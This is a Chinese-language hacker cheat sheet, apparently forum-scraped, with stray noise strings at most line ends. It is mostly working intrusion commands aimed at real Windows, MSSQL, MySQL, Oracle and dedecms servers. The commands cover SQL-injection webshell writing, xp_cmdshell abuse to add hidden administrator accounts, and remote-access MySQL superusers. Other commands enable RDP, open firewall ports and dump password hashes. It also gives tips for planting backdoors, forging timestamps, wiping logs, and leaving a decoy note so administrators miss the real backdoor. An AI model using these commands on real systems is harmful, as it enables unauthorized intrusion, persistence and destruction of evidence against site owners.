0 @3 p5 W. V% E9 \/ F1.net user administrator /passwordreq:no
) f. M: p, o% b) i9 M. w4 {' |这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了 X1 Y5 E+ a% u; n0 x, w; m& |# i
2.比较巧妙的建克隆号的步骤3 J0 b& a4 h0 }1 o& p) W
先建一个user的用户6 S# d% @6 e" B: Y5 c g7 E5 p! h
然后导出注册表。然后在计算机管理里删掉
9 l7 Q& h1 y9 p; X3 P* r在导入,在添加为管理员组
' O" T8 p# G G! q( i( Y. t3.查radmin密码
& ?7 o" Q1 a3 f' ^7 W: Y4 Zreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
) q9 ^+ v6 }; Y( a3 p) a4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
/ w7 f/ K% V1 u! f1 L建立一个"services.exe"的项% I! d9 T. s4 H+ c+ ?
再在其下面建立(字符串值): p4 g* A9 o7 a! G u4 e- q) }
键值为mu ma的全路径
4 V! A/ i* {1 t9 A5 s/ G5.runas /user:guest cmd4 o( x0 T! [( {& o, p/ ^
测试用户权限!9 a' G. B: C6 A9 V
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?! y% j" _* \9 K! ] w; y) o
7.入侵后漏洞修补、痕迹清理,后门置放:" W+ K3 y ?) }* O/ p4 u& J8 N
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门: p7 R/ S3 @( z0 V. J* F. a& ^
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c1 h0 K8 ~) f. m: Q$ d
$ j. B$ R& m: F* D& [6 Xfor example
3 B6 c3 @5 G% Q% j+ E
3 `7 Q0 t( r: R* p' W! |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'- k! A! ~6 W" m4 A
" Z1 d3 G+ p r! d+ N9 R5 \declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'& U5 @8 C9 m0 n1 m1 D" J
- N) Z9 ]- m3 B9 [4 N& J- b3 w* d
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
5 ?0 t: H9 X5 @* f! K如果要启用的话就必须把他加到高级用户模式
. ~1 E7 O1 V! t& o3 r( J% F可以直接在注入点那里直接注入$ j d: \" W# c/ \2 p7 s9 i6 R
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--! T9 i) O/ V* ]) \9 A+ O
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--3 W E- S" Y% e5 F
或者
+ D; x- K! s9 m8 o! {. i) T4 jsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
) J' v& i n: @来恢复cmdshell。" m0 E* W* `* N( y, H3 _2 F$ H
/ t1 }/ w4 W; [4 @# W" F
分析器: `1 e- s: M! R/ c: O, g0 H8 i
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--/ g! L" G1 A2 j6 i. f4 p" X& p7 n
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
0 o7 M8 T+ A1 s9 r/ j$ X! C10.xp_cmdshell新的恢复办法
; ^3 ^+ _1 o5 Z9 Lxp_cmdshell新的恢复办法9 ]$ ?3 r# t/ w' r9 M/ l" U. @6 N
扩展储存过程被删除以后可以有很简单的办法恢复:: Y0 M$ D+ F" K3 z' H/ W
删除
! u& x, } i3 Z' J# _8 y) K c9 O: rdrop procedure sp_addextendedproc
% B5 |/ v. X. X+ y ~$ Zdrop procedure sp_oacreate
7 ?9 [/ w3 ~# u4 b6 Oexec sp_dropextendedproc 'xp_cmdshell'- y* ^5 @" P8 a/ y c, @
, ]' \, Q ^; ^/ e0 w9 r8 o- P$ J
恢复
T2 `, H$ w, n1 q" zdbcc addextendedproc ("sp_oacreate","odsole70.dll"), c5 k' a& |4 v
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
, o9 ?& C S6 Z; Z7 M' f
/ l! u" Q7 I( i/ T) ]) k3 r6 Q这样可以直接恢复,不用去管sp_addextendedproc是不是存在
% W# P( w4 [! D' q
( Y' l: y4 D) ]: Y h& ~' ^! N-----------------------------+ O: u5 |3 @' r. A0 Y
0 V. ]* |2 ^3 }2 P' e删除扩展存储过过程xp_cmdshell的语句:
# L R: p0 v/ _9 ~exec sp_dropextendedproc 'xp_cmdshell'2 ?9 g' e& G5 ^6 p2 e9 a% i
0 }9 U: w9 C* s) P恢复cmdshell的sql语句4 t6 p5 M3 R( s6 j
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' J, e; t1 Q z
1 q5 K- ^2 C, K1 w J* x9 o
) [9 G% H. c* j' I2 |( x* F开启cmdshell的sql语句& l3 |1 ~ ?8 J% E+ j1 h0 B% [
0 z3 c, c6 J& v! Z0 X
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'- D% H' P; W3 S B$ V( H* |4 `0 u
' ]7 P0 P- g; N, d
判断存储扩展是否存在9 L. \3 i8 o6 a
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'5 s1 _+ w6 A: ]& n$ T# u
返回结果为1就ok6 h2 ?# @7 E/ q! q
7 d' @8 O8 c: \% x6 y, \7 |! o- Y恢复xp_cmdshell
' s2 U& i) G3 Bexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'# k/ O: q7 t! Y' z9 s* f* k4 U
返回结果为1就ok
7 i6 {0 k" a" M b% b3 C* n& A1 d" s/ _+ f, j9 M7 u
否则上传xplog7.0.dll
9 ]# F$ l) v5 T+ Z$ A$ F6 Nexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'; F3 A4 x( @7 [3 H8 C" H
6 F" V# V) l( {; d$ r- w L% ?堵上cmdshell的sql语句: E4 b9 `9 @5 c0 J/ q& y1 g
sp_dropextendedproc "xp_cmdshel
! Q2 G& R' X4 c6 w% E# P. r# l1 `7 L-------------------------
5 ?, i% }7 L) g6 u* c清除3389的登录记录用一条系统自带的命令:" E- O8 X& k- t ^
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
9 H9 L! M4 _9 R' ~; ~
, r- T; E6 Z t4 ~9 i8 H- H然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
; s. \. A5 B1 m4 \在 mysql里查看当前用户的权限
+ w# I) @5 ? V6 t6 ishow grants for ( n* R t3 `2 O* y
0 [" e. s! F6 _9 X0 n% q' u以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。; P1 `8 [/ j& `
1 h; p% b6 m& {9 l
! y0 I+ u9 Q/ ~5 g; zCreate USER 'itpro'@'%' IDENTIFIED BY '123';
9 z; q5 P% E1 h: G1 Q: ?2 D7 J m# r
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
3 w, D# W. g) ?" J; S# m+ i% q5 V9 U# U+ K4 g: e% m* q( M
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 03 R8 c2 l1 i: _0 _
4 W F) [4 N, GMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
, W- p5 i8 z* ^. ]# |+ p* {- x: g$ z
8 B) ]$ d' q7 G6 y5 V4 v搞完事记得删除脚印哟。
" X& d, x! N/ Y) ~4 Y( `& _5 M6 b7 x" I
Drop USER 'itpro'@'%';4 J) l3 r8 M$ Y' V! }7 D2 \; b1 S6 e4 m
8 Y3 D$ U: t$ i9 F" EDrop DATABASE IF EXISTS `itpro` ;
6 {, R- _6 v/ G! n* @% H5 K* t6 u" I8 Y
当前用户获取system权限6 u5 k2 I+ a4 |6 e. P& e
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
! [5 h& C- [; c" f; T# u2 p, Rsc start SuperCMD! r( ~3 [% k- P: s/ ~
程序代码
9 B; c' p' |) P) K<SCRIPT LANGUAGE="VBScript">
5 {) l9 i" K/ m; @) f# @4 dset wsnetwork=CreateObject("WSCRIPT.NETWORK")
& s# P" j. r2 N# `8 r+ ~& h# |os="WinNT://"&wsnetwork.ComputerName
: s3 k M8 M; d* w) D4 l- ]3 l9 j! |Set ob=GetObject(os)% K" `5 n7 [# C# i- E! w
Set oe=GetObject(os&"/Administrators,group")5 t* R# T- h y) U1 p
Set od=ob.Create("user","nosec")$ ] s+ G# E: \, I4 B
od.SetPassword "123456abc!@#"
: E( y8 k' p6 a% V" }' v0 ]od.SetInfo
2 C$ y3 C3 @" ~9 m' n1 W3 [2 QSet of=GetObject(os&"/nosec",user)
3 U& Y3 O( Q x c% {, joe.add os&"/nosec"4 X% e% z% S" ]* v1 f. f" O6 [
</Script>
1 T$ z0 W$ S7 j- {<script language=javascript>window.close();</script>
( x1 C/ [; h9 J8 t+ d3 N7 I" N* w' M7 N
* {9 R. v# q, d& Y0 U4 H4 E0 i
% Z9 X& W+ i1 L! O, H J: b9 j- O* |: A: [# p3 E. ]$ L2 t" O
突破验证码限制入后台拿shell1 _: i: E/ H' G
程序代码
$ w7 \) i8 ~0 Q5 X3 q) ?REGEDIT4
6 r0 Y5 B( |* l: P[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
6 [6 X5 M) F6 O P"BlockXBM"=dword:00000000
+ G4 p# r! P3 S1 \, M1 l; n' t5 H( ?. v d8 ^( E# E% J
保存为code.reg,导入注册表,重器IE
2 c, n; {3 [4 R就可以了
4 Q" V" O8 S, L; Q& {( Uunion写马
. W% g; c* ]/ V- p9 A程序代码5 d' j7 k+ y1 y5 Z7 O
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
6 N. W, b3 l% T; U
# g$ M! I) X9 {3 h9 l9 s# F应用在dedecms注射漏洞上,无后台写马
$ W% y9 L0 g! P$ U, R5 zdedecms后台,无文件管理器,没有outfile权限的时候
$ G. W/ _1 Q: J K" P在插件管理-病毒扫描里, Y4 O6 a" M- { Y% [
写一句话进include/config_hand.php里
9 J7 e1 M# Z/ L# P程序代码) s# E2 x1 ^0 t: `6 F! s
>';?><?php @eval($_POST[cmd]);?>
6 A6 k1 N6 d* M& @/ d
$ @; h4 P) H. J+ Z8 y7 I/ }
' N& f; B& L0 P8 F2 {% h* k如上格式
& m+ i; T* I, ]4 N2 ^% Z. }7 T; J, x6 T$ i0 r7 S# }4 L5 M
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
2 \, }2 F7 d# f) I4 Z' _8 I* J: P程序代码5 V: H4 a; m. b* r: X
select username,password from dba_users;( Y2 `' _% J2 O7 q8 l3 R0 P
3 i3 X3 r* p$ H: d, g/ r3 l! s
4 c3 R, K3 m* B: C) [mysql远程连接用户7 [7 W8 G; d$ R5 j
程序代码
0 w5 Q N3 x& ]7 U, f' C- a0 Z. _$ }$ y, A I- T
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
$ J8 M4 Z9 W9 R' e$ C- r/ NGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
" }7 T- U c, jMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
0 T! X9 }8 B1 M; s( ^MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
, R& V3 I( r- V! Y2 K9 b% G) |" g7 Y7 O
) } l9 A9 P* |; _; }
/ g- A5 m' U8 [7 T- z
; v9 u" x% W8 i5 O0 secho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
4 X' |" ]- k& N/ C0 F: u( G2 q+ d5 _/ z- P9 L1 M" C
1.查询终端端口
$ D( d k- o4 S% R# L& f
" x- d' }8 e t' Hxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2 _/ D2 M% E) I) Q9 x J; |3 G( Z( @1 G h1 `/ g$ }/ }
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
9 l) [* [! Y8 ttype tsp.reg
1 @: Y: S5 v6 Y" y9 x9 {
1 G7 t% ?/ p" _2.开启XP&2003终端服务
3 r- _. g% d' q3 p
, {, A% X+ H, o% O* e* v1 V
& ^, K5 r! ?; x) |REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f5 W! K. l* q5 p7 S+ T
6 {& ?: r4 C( I! T# y0 o9 q( z
; k6 \/ X+ Z7 P2 d) R
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f- T9 j4 p0 {5 S( h9 @
" o5 \# l9 _- y1 f9 E3.更改终端端口为20008(0x4E28)
7 {( f3 v* K7 R& ]3 y8 q" \- R5 r8 D) j" }: u3 S" r( L
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
1 G3 k0 ?: t" H+ g! b d6 \) ?- K; r" U; q% [+ Z6 P+ Q
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
0 Z j' X3 G4 c. _( ~8 K& W& A0 f @7 A9 G; c! `6 N! \0 x0 P
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制) i6 M ~$ d7 y9 _5 _( S2 o/ B
+ m: H% l% d8 ^% @+ P! E$ }6 ]
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f0 C( K% u$ K8 o- C9 B$ m( a7 A8 ~+ m
6 v" H% @* Z* W# _0 m- G; Y7 S
% x6 \9 h: W) y' K1 ~
5.开启Win2000的终端,端口为3389(需重启)
( R) m V9 ~5 y+ j* ]
G! C' X, u; y. Hecho Windows Registry Editor Version 5.00 >2000.reg ( W9 j' V, {' P& M* O1 O0 j
echo. >>2000.reg6 ?0 U- ]5 d5 s$ P+ j; M0 z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
6 H! F0 K2 [5 B7 P8 K) fecho "Enabled"="0" >>2000.reg
: K$ c1 p* S `& Z. iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg ' ]3 Z3 ~6 P( \; p+ y
echo "ShutdownWithoutLogon"="0" >>2000.reg 8 ~4 {: G! B' v: w, B0 z5 M
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
9 g/ r C0 C7 K9 v& V, y! l# Mecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg 4 ]5 t& n# V. |& ]: W
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg * v7 h: S2 n- S& \6 k) l
echo "TSEnabled"=dword:00000001 >>2000.reg
! V1 b1 U- u+ Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg & w2 K1 o, C3 c$ t# t# B: R
echo "Start"=dword:00000002 >>2000.reg
: s+ P s; V% j6 i+ Q$ Z$ [& Uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg & h. H2 m1 o G9 D: p
echo "Start"=dword:00000002 >>2000.reg
4 T" ]: q/ A; `3 decho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 6 I# A# @( H2 q/ ^# u x
echo "Hotkey"="1" >>2000.reg
2 O$ p* o. S/ i0 L2 T; y" Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg , A/ W7 J/ s! L1 E% G% s
echo "ortNumber"=dword:00000D3D >>2000.reg 0 Q* S+ P0 [: D) f S) g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
6 s: p# h. O, d, Eecho "ortNumber"=dword:00000D3D >>2000.reg3 W( ?0 b9 k$ a) u, N$ ]1 i
8 [1 d0 Q9 j( {2 \. G' `
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)! o% W, p# j7 z" ~$ f& G
( \- H; p( j8 u; i
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf) p: h8 ^) ]) A' [, G8 @
(set inf=InstallHinfSection DefaultInstall) m5 `7 l( r: U
echo signature=$chicago$ >> restart.inf
0 r2 [, [* X' lecho [defaultinstall] >> restart.inf
! [, D& f" o4 Q' E9 Wrundll32 setupapi,%inf% 1 %temp%\restart.inf9 n6 ]# O8 {$ t* ?& \3 a" y @
+ S0 m9 o' R+ j! V
5 v# V- B. ^, m; u* A4 e# j. |- ]7.禁用TCP/IP端口筛选 (需重启)
; x5 E6 k: J4 _' [3 o$ M8 u$ `# R' w( `
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
1 p/ ]+ X9 i( a, r5 r
; u2 i! Z" k- @; r0 @8.终端超出最大连接数时可用下面的命令来连接4 `- u- y9 ^( b) g# I: w' {
3 p8 J9 ]: K+ m# qmstsc /v:ip:3389 /console3 y$ e1 i, H% g% N
6 p5 A! X4 L6 S: o- c( B9.调整NTFS分区权限
$ [; {4 W$ H& j0 Q* D% J
. W+ G) u; p/ S% n! W8 Hcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
' e: {& a; [; \; j% u0 {9 {" D8 X+ w T
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件); `4 P8 j' g* c6 t; m; n' R) u
: E. ^6 {$ N% w; Y2 n5 N7 A5 l
------------------------------------------------------
* B3 `) C# y% I* D5 i3389.vbs 1 j) r5 A% a1 X: Z1 k
On Error Resume Next; a( n W' o" K
const HKEY_LOCAL_MACHINE = &H80000002$ F* ?- U) u) B) T6 F/ r
strComputer = "." n! J& @2 [$ \ G4 E& H) c4 s
Set StdOut = WScript.StdOut
: ]- t! k$ C w6 b: s. ZSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
- e( g; _, E: sstrComputer & "\root\default:StdRegProv")! ~! X8 w) m) Y7 N# u% {
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"% {: s" j% U5 b' o9 f
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath& m; e2 n( N9 _4 \
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp", w; f6 I. M+ b: b. T7 r
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
2 ~3 L- C: l o( Q |strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"8 H: R; \* z+ q4 C* U
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"8 |! e1 T# r( p/ T; E. s
strValueName = "fDenyTSConnections": z m9 `; \" }$ m- h
dwValue = 0( F) S6 m+ ~9 w8 [' V1 @
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue6 V. `* s# y; J( _* J
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"9 Z: v6 p/ p$ s6 \/ W& W& N" I+ u
strValueName = "ortNumber"
- ^7 l) r( H# |9 i qdwValue = 3389
- W+ a$ {/ m) m6 R/ horeg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue6 k4 l7 Y( b7 }
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"& D9 i2 }; V9 R" v
strValueName = "ortNumber"
' O1 @$ E+ ]7 J3 `; z8 GdwValue = 3389
* w' T- a) C- g4 ~1 @0 k( m9 C) Coreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
& e+ B" n$ C8 h7 ^. \! }0 n- ZSet R = CreateObject("WScript.Shell")
' `, P$ B# K' n# U( Q0 w YR.run("Shutdown.exe -f -r -t 0")
" I+ _" \- w1 I1 ?
# q1 Z, m: Y E( P7 U2 p0 Z7 q删除awgina.dll的注册表键值6 g: j0 V' H) A- G, q
程序代码
2 a; o0 S8 t2 F' e
' F- c/ ^ ~8 @3 g+ |. treg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f6 H0 R( m( n% w4 D
# a- |: J$ R1 v5 r4 m# T5 [% f
8 c) b( n" I4 q4 s0 u% T7 }4 k5 a$ {/ d, e- J) s
- V( m+ B8 y3 [+ e5 r3 G程序代码' w& o2 g3 ]% n5 t% [6 X
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash3 n" _3 P: R6 }3 U( p: k6 z
) p3 m" \/ @' O- v' Z3 P5 g. @设置为1,关闭LM Hash4 J& m; m5 d& m# C
; n2 h$ T6 @4 ]5 e2 d数据库安全:入侵Oracle数据库常用操作命令2 ^8 n G+ G1 w6 P5 g5 T6 B: U* b
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。2 K$ u' |5 n: ]6 Q
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
! ]1 ?4 p/ R- F2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;( ?; G% c" }' _& z) U4 A
3、SQL>connect / as sysdba ;(as sysoper)或
4 i/ C0 T4 t& X* O2 Pconnect internal/oracle AS SYSDBA ;(scott/tiger)
& P. s/ G- _0 ]' w6 \conn sys/change_on_install as sysdba;
2 @! U H1 W: [. a0 a4、SQL>startup; 启动数据库实例0 A) Q! j2 h6 h( ^# c
5、查看当前的所有数据库: select * from v$database;# W2 S+ D& Q0 R
select name from v$database;
$ X; z! m/ o* q4 ^; Y; p6、desc v$databases; 查看数据库结构字段! P! U% ^, P$ D/ w8 o) b
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:5 ~1 Z: y! F* _. _: H
SQL>select * from V_$PWFILE_USERS;" E4 x; m% \9 A8 s$ n8 v& e
Show user;查看当前数据库连接用户
) f f* D0 Y" c# W4 X$ q8、进入test数据库:database test;
+ j) c5 }% ~* W9、查看所有的数据库实例:select * from v$instance;
+ d. G2 s, j* C+ f. f0 ?如:ora9i+ Q0 J+ c2 ]7 o6 P0 N
10、查看当前库的所有数据表:* y' S0 s+ I$ g& w* ?( v
SQL> select TABLE_NAME from all_tables;
0 x; r$ |& M5 N) j0 yselect * from all_tables;
6 r- \+ @+ d% cSQL> select table_name from all_tables where table_name like '%u%';( {- X4 U- t3 b$ g( i' a: h
TABLE_NAME
( \% |6 w9 Y% W L- P/ ]------------------------------5 i7 @0 y0 P2 f6 \' z* k4 S1 j1 i) P
_default_auditing_options_
5 ?9 d& j# I! |' D11、查看表结构:desc all_tables;1 q+ {1 W. P& Q
12、显示CQI.T_BBS_XUSER的所有字段结构:1 O$ d$ |6 K2 ?- ]& f1 l
desc CQI.T_BBS_XUSER;8 A0 `+ |$ i) x4 v* i- N
13、获得CQI.T_BBS_XUSER表中的记录:" V3 @2 e' N( Q4 H
select * from CQI.T_BBS_XUSER;
' A& y8 V8 K* r7 C" J14、增加数据库用户:(test11/test)2 r! B9 }- H. R& w
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;, s* @- g3 y; o5 J6 I* F" k
15、用户授权:
$ W$ `6 Y4 l" t; p" c9 A- Igrant connect,resource,dba to test11;
* I, u( R" g1 ?) Zgrant sysdba to test11;7 ]1 c1 Z/ K6 S5 o# p
commit;: K# b0 g+ j* y* m- ~; T+ t2 [
16、更改数据库用户的密码:(将sys与system的密码改为test.)
$ N, i% W# P; x2 r3 A! xalter user sys indentified by test;
! G& b" e7 F$ P! B0 @alter user system indentified by test;
$ w- S7 t- j5 q$ m" t" q2 S: ~ g* H
applicationContext-util.xml
9 C+ K3 h$ T! z7 B2 y, l5 tapplicationContext.xml
+ K+ T, m' E1 e1 \$ r8 m, Zstruts-config.xml8 S( n1 M5 _6 k% F
web.xml. i; i* Y2 }% S; g- j$ N
server.xml
6 {+ e7 H! t2 F6 r. itomcat-users.xml# s* ^# f- x" A2 Z) K$ R
hibernate.cfg.xml
/ n/ w7 F- N. |database_pool_config.xml5 Y$ I8 c! u& j E1 v
$ B' n7 N. I q% r5 J$ E: _+ K* Y( [* I) ]9 T
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
& V# m' `) m& }: F. \( O( W, f* l\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
" B! e0 a% ^3 o0 ~\WEB-INF\struts-config.xml 文件目录结构* i1 M6 C$ C' P6 ~6 v1 I& o. N2 ^& E
% ]% ^3 t4 {6 w
spring.properties 里边包含hibernate.cfg.xml的名称' ^" m/ B- q9 j) I1 U& |: a; h
% a4 R6 Z) ]2 J. y
& E3 x7 o5 O6 @! o" a
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
! y3 o, w" J+ G; R3 s; {2 Q1 u
# z$ L- t/ [; I) k7 F, w! q如果都找不到 那就看看class文件吧。。: w& S d7 R0 T9 A
. b8 E: A4 u. o: R/ M
测试1:
7 n$ ~. O2 V5 L/ m& O; ASELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
0 c! e. \6 ]: H+ O
$ k6 U% Y6 u. l j$ I- s; k8 p1 _测试2:7 O3 b) F0 x G$ h
1 I3 w/ p, k+ j5 A, icreate table dirs(paths varchar(100),paths1 varchar(100), id int)
8 e& n" i. [1 |* n8 Q6 f6 t& z
: [. e' e3 o# e E2 B, qdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--( E! U- Z) Q+ a: v1 {' ^
/ o) n& K4 I% e- U) \7 S
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
* M! b+ V- h5 C C7 W; a6 N/ I5 m
查看虚拟机中的共享文件:2 Q4 R! J9 T1 W# }/ B
在虚拟机中的cmd中执行1 Z0 \! m/ I/ w
\\.host\Shared Folders
! @# P9 X7 E. j) c
0 I* v/ w: p5 ^cmdshell下找终端的技巧! X& {% o9 f9 R
找终端: # |/ E" A: T* a8 I( `" _
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
7 g- ]5 } {3 g: M; U 而终端所对应的服务名为:TermService
" D$ a2 v k1 I9 A第二步:用netstat -ano命令,列出所有端口对应的PID值!
. j8 ~ t. p; p* \" ~ 找到PID值所对应的端口' r `& G+ `* ?( w& O# }( Z! O
9 ?3 W% X" s; g% A. e- l$ P% C, y4 ]
查询sql server 2005中的密码hash
. h# e! I* S: m$ g# {# Z" CSELECT password_hash FROM sys.sql_logins where name='sa'- I: u$ L1 T' Y
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
( {! c' D& z# Z! P Iaccess中导出shell: Z/ y7 v8 H$ P8 K0 Y6 g
) {) r; L0 S8 Z/ d/ F中文版本操作系统中针对mysql添加用户完整代码:
/ ^' Y% c! v; N4 _( R: |# _' c( E$ O9 n. o( M
use test;
